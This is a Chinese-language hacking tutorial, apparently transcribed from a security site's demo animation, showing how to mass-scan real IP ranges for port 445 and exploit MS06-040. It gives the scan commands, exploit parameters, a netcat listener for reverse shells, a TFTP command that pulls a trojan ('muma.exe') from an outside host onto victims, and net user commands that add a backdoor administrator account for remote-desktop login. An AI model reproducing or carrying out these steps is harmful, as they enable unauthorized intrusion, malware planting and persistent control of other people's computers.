动画介绍:首先先扫描开放:
第1步:445端口的主机
第2步:溢出拿权限
第3步:种木马 那看你自己的本教程使用TFTP传马
==========================================
S扫描:s syn 210.149.40.0 210.175.255.255 445 512 /save WIN2000 WINXP SP1 WIN2003
s tcp 210.149.40.0 210.175.255.255 445 512 /save FOR WINXP SP2
==========================================
溢出参数:
ms06040 210.149.40.0 218.5.76.8 8081 1 单个溢出使用这些参数, 我就不介绍了!
溢出程序 他的IP 你的IP 端口
我这里 直接用(批量自动溢出.bat)了这个自己看吧
等扫描完毕我就开始溢出了 , 先改动BAT里的参数先!
改好BAT参数后 开始溢出 OK
=========================================
溢出前先用NC监听一个本地端口(8081):
nc -l -v -p 8081
这个是接受反会来的溢出结果的 开越多越好 我只是演示不开这么多了!
===========
现在等溢出成功返回的连接了……
OK…… 溢出一个 来了哈 中木马
------------------------------------------
下面不看也罢,我没用反向连接的木马哈哈!
TFTP 给他放个木马 :tftp -i 61.233.62.254 get muma.exe c:\c.exe
你架设的IP 由于我这里不能打开TFTP.exe 就用别的机器了
晕好象失去主机连接了 ,换个 日本太远了卡…… 这个BAT编写的不好 哪位大虾编个好的!
郁闷上传木马出了点问题不演示了,大家知道就可以了 如果开3389 就利用下面的命令给他加用户
最后用3389 登陆玩吧!
------------------------------------------
下面是加用户:
net user
net user msmm msmm /add
net localgroup administrators msmm /add
net localgroup administrator(s) msmm /add备用
删除用户动画结束
net user msmm /del | 
安全中国首页 > 动画中心 > 综合漏洞动画
